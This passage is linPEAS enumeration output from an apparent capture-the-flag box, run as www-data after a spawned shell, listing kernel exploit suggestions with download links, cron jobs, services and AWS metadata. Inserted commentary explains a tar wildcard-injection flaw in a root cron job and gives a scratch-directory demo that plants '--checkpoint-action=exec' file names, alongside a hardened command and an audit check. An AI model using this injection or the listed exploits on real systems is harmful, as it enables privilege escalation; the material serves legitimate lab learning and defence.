[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

[+] [CVE-2017-1000253] PIE_stack_corruption

   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: less probable
   Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c

[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE

   Details: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
   Exposure: less probable
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
   Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only

[+] [CVE-2016-2384] usb-midi

   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user

[+] [CVE-2016-0728] keyring

   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
  [1] af_packet
      CVE-2016-8655
      Source: http://www.exploit-db.com/exploits/40871
  [2] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [3] get_rekt
      CVE-2017-16695
      Source: http://www.exploit-db.com/exploits/45010


╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... disabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (xen)

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
                                   ╚═══════════╝
╔══════════╣ Container related tools present
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No


                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
                                     ╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. Yes
═╣ AWS Lambda? .......................... No

╔══════════╣ AWS EC2 Enumeration
ami-id: ami-0ca4a09497c5052c4
instance-action: none
instance-id: i-01db65ca72c1ed35e
instance-life-cycle: on-demand
instance-type: t2.nano
region: eu-west-1

══╣ Account Info
{
  "Code" : "Success",
  "LastUpdated" : "2023-03-14T16:57:07Z",
  "AccountId" : "739930428441"
}

══╣ Network Info
Mac: 02:09:c7:bb:bf:13/
Owner ID: 739930428441
Public Hostname: 
Security Groups: AllowEverything
Private IPv4s:

Subnet IPv4: 10.10.0.0/16
PrivateIPv6s:

Subnet IPv6: 
Public IPv4s:



══╣ IAM Role


══╣ User Data


                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         1  0.3  0.8  37852  4440 ?        Ss   09:22   0:07 /sbin/init noprompt
root       199  0.0  0.4  27704  2452 ?        Ss   09:22   0:01 /lib/systemd/systemd-journald
root       263  0.0  0.5  44576  2876 ?        Ss   09:22   0:01 /lib/systemd/systemd-udevd
systemd+   307  0.0  0.4 100324  2324 ?        Ssl  09:22   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root       517  0.0  0.3  16124  1660 ?        Ss   09:22   0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       560  0.0  0.5 275860  2696 ?        Ssl  09:23   0:00 /usr/lib/accountsservice/accounts-daemon
root       565  0.0  0.4  29008  2320 ?        Ss   09:23   0:00 /usr/sbin/cron -f
root       570  0.0  0.1  20096   792 ?        Ss   09:23   0:00 /lib/systemd/systemd-logind
message+   572  0.0  0.6  42896  3116 ?        Ss   09:23   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  └─(Caps) 0x0000000020000000=cap_audit_write
syslog     588  0.0  0.4 256392  2396 ?        Ssl  09:23   0:00 /usr/sbin/rsyslogd -n
root       632  0.0  0.3  15752  1792 ttyS0    Ss+  09:23   0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root       633  0.0  0.3  15936  1516 tty1     Ss+  09:23   0:00 /sbin/agetty --noclear tty1 linux
mysql      676  1.1 37.8 1136096 188576 ?      Ssl  09:23   0:27 /usr/sbin/mysqld
root       683  0.0  1.1  65512  5484 ?        Ss   09:23   0:00 /usr/sbin/sshd -D
root       713  0.1  4.8 303048 24316 ?        Ss   09:23   0:03 /usr/sbin/apache2 -k start
www-data   949 15.3  2.7 303552 13940 ?        S    09:28   5:07  _ /usr/sbin/apache2 -k start
www-data  1880  0.0  2.6 303528 13116 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
www-data  1918  0.0  2.6 303528 12948 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
www-data  1924  0.0  2.7 303764 13892 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
www-data  1925  0.0  2.6 303724 13160 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
www-data  1929  0.0  2.8 303752 14348 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
www-data  1970  0.0  2.5 303528 12892 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
www-data  1980 15.6  2.6 303940 13408 ?        R    09:41   3:08  _ /usr/sbin/apache2 -k start
www-data  6567  0.0  0.1   4504   748 ?        S    09:56   0:00  |   _ sh -c sh
www-data  6568  0.0  0.1   4504   692 ?        S    09:56   0:00  |       _ sh
www-data  6569  0.1  1.7  35840  8484 ?        S    09:56   0:00  |           _ python3 -c import pty;pty.spawn("/bin/bash")
www-data  6570  0.0  0.6  18212  3352 pts/0    Ss   09:56   0:00  |               _ /bin/bash
www-data  6574  0.4  0.4   5200  2396 pts/0    S+   09:56   0:01  |                   _ /bin/sh ./linpeas.sh
www-data 10798  0.0  0.1   5200   848 pts/0    S+   10:02   0:00  |                       _ /bin/sh ./linpeas.sh
www-data 10802  0.0  0.5  34556  2980 pts/0    R+   10:02   0:00  |                       |   _ ps fauxwww
www-data 10801  0.0  0.1   5200   848 pts/0    S+   10:02   0:00  |                       _ /bin/sh ./linpeas.sh
www-data  1981  0.0  2.6 303700 13196 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
www-data  2011  0.0  2.7 303712 13940 ?        S    09:41   0:00  _ /usr/sbin/apache2 -k start
root       733  0.0  4.1 266376 20784 ?        Ss   09:23   0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
www-data   748  0.0  0.8 266376  4176 ?        S    09:23   0:00  _ php-fpm: pool www
www-data   749  0.0  0.8 266376  4176 ?        S    09:23   0:00  _ php-fpm: pool www

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND     PID  TID             USER   FD      TYPE DEVICE SIZE/OFF   NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 process found (dump creds from memory as root)
sshd Not Found

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root     805 Feb  9  2020 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 89 root root 4096 Feb 13  2020 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  670 Jun 22  2017 php
-rw-r--r--  1 root root  191 Feb  6  2020 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 89 root root 4096 Feb 13  2020 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  539 Jun 11  2018 apache2
-rwxr-xr-x  1 root root 1474 Oct  9  2018 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root  372 May  5  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  435 Nov 17  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 89 root root 4096 Feb 13  2020 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 89 root root 4096 Feb 13  2020 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 89 root root 4096 Feb 13  2020 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
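
The last crontab line is the one worth reading twice: every two minutes root changes into /home/mandre/backup and runs `tar -zcf /tmp/andre_backup.tar.gz *`. The `*` is expanded by cron's shell before tar starts, so the directory's file names become tar's arguments, and any name that begins with `--` is parsed as an option rather than a path. GNU tar's `--checkpoint=N` together with `--checkpoint-action=exec=COMMAND` is enough to turn that into command execution as the job's user. Two smaller points from the same output: "Modified interesting files in the last 5mins" lists /tmp/andre_backup.tar.gz, so the job is live, and because tar creates that archive under the job's umask (normally 022), whatever is in the backup directory ends up readable by every local user.

The script below is an added example written for this page; it is not part of the original writeup and is not meant to be run on the box. It reproduces the situation as an unprivileged user in a scratch directory: `make_scratch` plants `runme.sh` plus the two option-shaped file names, `demo_wildcard` runs the cron job's exact tar invocation and reports `vulnerable` when the planted command fired, `demo_hardened` runs the same command with `--` so the names are archived as data, and `audit_cron` is a small awk check that flags the same pattern in crontab text (`sample_crontab` feeds it the lines copied from the crontab above). The function names, the `marker` file and the `runme.sh` payload are my own choices; the tar and awk options are standard GNU tar and POSIX awk. BusyBox tar has no `--checkpoint`, so on such a system the two demos report `unsupported` instead of guessing.

```shell
#!/bin/sh
# Added example (not from the original writeup): wildcard injection against
# "tar -zcf archive.tar.gz *" and the hardened equivalent.  Runs as an
# unprivileged user in a scratch directory; it never touches the box's cron
# job or /tmp paths.

# Scratch "backup" directory containing:
#   runme.sh                                -> the command we want tar to run
#   --checkpoint=1                          -> option-shaped file name
#   --checkpoint-action=exec=sh runme.sh    -> option-shaped file name
# The option-shaped names are created through redirection so that our own
# shell never treats them as options either.  Prints the scratch root.
make_scratch() {
  dir=$(mktemp -d) || return 1
  mkdir "$dir/backup"
  printf 'touch "%s"\n' "$dir/marker" > "$dir/backup/runme.sh"
  : > "$dir/backup/--checkpoint=1"
  : > "$dir/backup/--checkpoint-action=exec=sh runme.sh"
  printf '%s\n' "$dir"
}

# The cron job's invocation, unchanged.  Prints "vulnerable" if the planted
# command ran, "safe" if it did not, "unsupported" if this is not GNU tar
# (BusyBox tar has no --checkpoint, so the result would be meaningless).
demo_wildcard() {
  tar --version 2>/dev/null | grep -q 'GNU tar' || { echo unsupported; return 0; }
  dir=$(make_scratch) || return 1
  # The shell expands * to the file names; tar sees the two --checkpoint
  # entries as options only because they appear in argv.
  ( cd "$dir/backup" && tar -zcf "$dir/out.tar.gz" * ) >/dev/null 2>&1 || true
  if [ -e "$dir/marker" ]; then echo vulnerable; else echo safe; fi
  rm -rf "$dir"
}

# Same job with "--" terminating option parsing: the option-shaped names are
# archived as ordinary files and the planted command never runs.
demo_hardened() {
  tar --version 2>/dev/null | grep -q 'GNU tar' || { echo unsupported; return 0; }
  dir=$(make_scratch) || return 1
  ( cd "$dir/backup" && tar -zcf "$dir/out.tar.gz" -- * ) >/dev/null 2>&1 || true
  if [ -e "$dir/marker" ]; then echo vulnerable; else echo safe; fi
  rm -rf "$dir"
}

# Audit: reads crontab text on stdin and prints every root job that hands a
# bare "*" glob to tar without a "--" separator.  Skips comments, blank lines
# and VAR=value lines; field 6 of a system crontab entry is the user.
audit_cron() {
  awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }
    /^[A-Za-z_]+=/           { next }
    $6 == "root" && /tar[^|;&]*[ \t]\*([ \t]|$)/ && !/tar[^|;&]*[ \t]--[ \t]/ { print }
  '
}

# Root crontab entries copied from the linpeas output above, as audit input.
sample_crontab() {
  cat <<'EOF'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/2 *   * * *   root    cd /home/mandre/backup && tar -zcf /tmp/andre_backup.tar.gz *
EOF
}

# Stand-alone run: flag the offending crontab line, then run both demos.
sample_crontab | audit_cron
echo "wildcard: $(demo_wildcard)  hardened: $(demo_hardened)"
```

On a GNU tar system this prints the `*/2` crontab line followed by `wildcard: vulnerable  hardened: safe`. The fix for the job itself is the hardened form, or `tar -zcf /tmp/andre_backup.tar.gz -C /home/mandre/backup .`, and in either case root should not be archiving a directory that the backed-up user can write to into a fixed, predictable /tmp path.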

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/networking.service is executing some relative path
/etc/systemd/system/network-online.target.wants/networking.service is executing some relative path
/lib/systemd/system/emergency.service is executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                         LEFT     LAST                         PASSED    UNIT                         ACTIVATES
Tue 2023-03-14 21:28:51 PDT  11h left Tue 2023-03-14 09:23:01 PDT  39min ago apt-daily.timer              apt-daily.service
Wed 2023-03-15 06:58:49 PDT  20h left Tue 2023-03-14 09:23:01 PDT  39min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Wed 2023-03-15 09:37:34 PDT  23h left Tue 2023-03-14 09:37:34 PDT  25min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a                          n/a      n/a                          n/a       ureadahead-stop.timer        ureadahead-stop.service

╔══════════╣ Analyzing .timer files
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers

╔══════════╣ Analyzing .socket files
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/lib/systemd/system/systemd-bus-proxyd.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/lib/systemd/system/uuidd.socket is calling this writable listener: /run/uuidd/request

╔══════════╣ Unix Sockets Listening
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/run/dbus/system_bus_socket
  └─(Read Write)
/run/mysqld/mysqld.sock
  └─(Read Write)
/run/php/php7.0-fpm.sock
  └─(Read Write)
/run/systemd/fsck.progress
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/var/run/dbus/system_bus_socket
  └─(Read Write)
/var/run/mysqld/mysqld.sock
  └─(Read Write)

╔══════════╣ D-Bus config files
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.network1.conf (        <policy user="systemd-network">)
Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.resolve1.conf (        <policy user="systemd-resolve">)

╔══════════╣ D-Bus Service Objects list
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                               PID PROCESS         USER             CONNECTION    UNIT                      SESSION    DESCRIPTION        
:1.0                                 1 systemd         root             :1.0          init.scope                -          -                  
:1.1                               570 systemd-logind  root             :1.1          systemd-logind.service    -          -                  
:1.11                            12989 busctl          www-data         :1.11         apache2.service           -          -                  
:1.2                               560 accounts-daemon root             :1.2          accounts-daemon.service   -          -                  
com.ubuntu.LanguageSelector          - -               -                (activatable) -                         -         
org.freedesktop.Accounts           560 accounts-daemon root             :1.2          accounts-daemon.service   -          -                  
org.freedesktop.DBus               572 dbus-daemon     messagebus       org.freedesktop.DBus dbus.service              -          -                  
org.freedesktop.hostname1            - -               -                (activatable) -                         -         
org.freedesktop.locale1              - -               -                (activatable) -                         -         
org.freedesktop.login1             570 systemd-logind  root             :1.1          systemd-logind.service    -          -                  
org.freedesktop.network1             - -               -                (activatable) -                         -         
org.freedesktop.resolve1             - -               -                (activatable) -                         -         
org.freedesktop.systemd1             1 systemd         root             :1.0          init.scope                -          -                  
org.freedesktop.timedate1            - -               -                (activatable) -                         -         


                              ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
                              ╚═════════════════════╝
╔══════════╣ Hostname, hosts and DNS
cmess
127.0.0.1	localhost
127.0.1.1	cmess	dev.cmess.thm
127.0.0.1	gilacms.com

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0      Link encap:Ethernet  HWaddr 02:09:c7:bb:bf:13  
          inet addr:10.10.105.35  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::9:c7ff:febb:bf13/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:64628 errors:0 dropped:0 overruns:0 frame:0
          TX packets:63262 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:4858546 (4.8 MB)  TX bytes:9400313 (9.4 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1619 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1619 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:156180 (156.1 KB)  TX bytes:156180 (156.1 KB)


╔══════════╣ Active Ports
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               

╔══════════╣ Can I sniff with tcpdump?
No



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users
uid=33(www-data) gid=33(www-data) groups=33(www-data)

╔══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking sudo tokens
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens
ptrace protection is enabled (1)
gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it

╔══════════╣ Checking Pkexec policy
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2

╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Users with console
andre:x:1000:1000:andre,,,:/home/andre:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=1000(mandre) gid=1000(mandre) groups=1000(mandre)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=108(mysql) gid=117(mysql) groups=117(mysql)
uid=109(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Login now
 10:03:14 up 40 min,  0 users,  load average: 3.04, 2.51, 1.81
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

╔══════════╣ Last logons
mandre    tty1         Sun Feb  9 11:02:51 2020 - down                      (00:01)     0.0.0.0
reboot   system boot  Sun Feb  9 11:02:38 2020 - Sun Feb  9 11:04:02 2020  (00:01)     0.0.0.0
mandre    tty1         Sun Feb  9 10:58:15 2020 - down                      (00:04)     0.0.0.0
reboot   system boot  Sun Feb  9 10:57:50 2020 - Sun Feb  9 11:02:24 2020  (00:04)     0.0.0.0
mandre    tty1         Thu Feb  6 18:18:33 2020 - crash                    (2+16:39)    0.0.0.0
reboot   system boot  Thu Feb  6 18:18:21 2020 - Sun Feb  9 11:02:24 2020 (2+16:44)    0.0.0.0
mandre    tty1         Thu Feb  6 18:01:42 2020 - crash                     (00:16)     0.0.0.0
reboot   system boot  Thu Feb  6 18:00:21 2020 - Sun Feb  9 11:02:24 2020 (2+17:02)    0.0.0.0

wtmp begins Thu Feb  6 18:00:21 2020

╔══════════╣ Last time logon each user
Username         Port     From             Latest
mandre            pts/0    10.0.0.20        Thu Feb 13 15:02:43 -0800 2020

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/bin/nc
/bin/netcat
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget

╔══════════╣ Installed Compilers
/usr/share/gcc-5

╔══════════╣ MySQL version
mysql  Ver 14.14 Distrib 5.7.29, for Linux (x86_64) using  EditLine wrapper


═╣ MySQL connection using default root/root ........... No
═╣ MySQL connection using root/toor ................... No
═╣ MySQL connection using root/NOPASS ................. No

╔══════════╣ Searching mysql credentials and exec
From '/etc/mysql/mysql.conf.d/mysqld.cnf' Mysql user: user		= mysql
Found readable /etc/mysql/my.cnf
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mysql.conf.d/

╔══════════╣ Analyzing MariaDB Files (limit 70)

-rw------- 1 root root 317 Feb  6  2020 /etc/mysql/debian.cnf

╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
Apache version: Server version: Apache/2.4.18 (Ubuntu)
Server built:   2019-10-08T13:31:25
httpd Not Found

Nginx version: nginx Not Found

/etc/apache2/mods-enabled/php7.0.conf-<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
/etc/apache2/mods-enabled/php7.0.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-enabled/php7.0.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-enabled/php7.0.conf:    SetHandler application/x-httpd-php-source
--
/etc/apache2/mods-available/php7.0.conf-<FilesMatch ".+\.ph(p[3457]?|t|tml)$">
/etc/apache2/mods-available/php7.0.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php7.0.conf-<FilesMatch ".+\.phps$">
/etc/apache2/mods-available/php7.0.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Feb  6  2020 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Feb  6  2020 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Feb  6  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
<Directory "/var/www/html">
	AllowOverride All
</Directory>
	
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	ServerName dev.cmess.thm
	DocumentRoot /var/www/dev
	
</VirtualHost>


-rw-r--r-- 1 root root 1516 Feb  6  2020 /etc/apache2/sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
<Directory "/var/www/html">
	AllowOverride All
</Directory>
	
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	ServerName dev.cmess.thm
	DocumentRoot /var/www/dev
	
</VirtualHost>
lrwxrwxrwx 1 root root 35 Feb  6  2020 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
	ServerAdmin webmaster@localhost
	DocumentRoot /var/www/html
<Directory "/var/www/html">
	AllowOverride All
</Directory>
	
	ErrorLog ${APACHE_LOG_DIR}/error.log
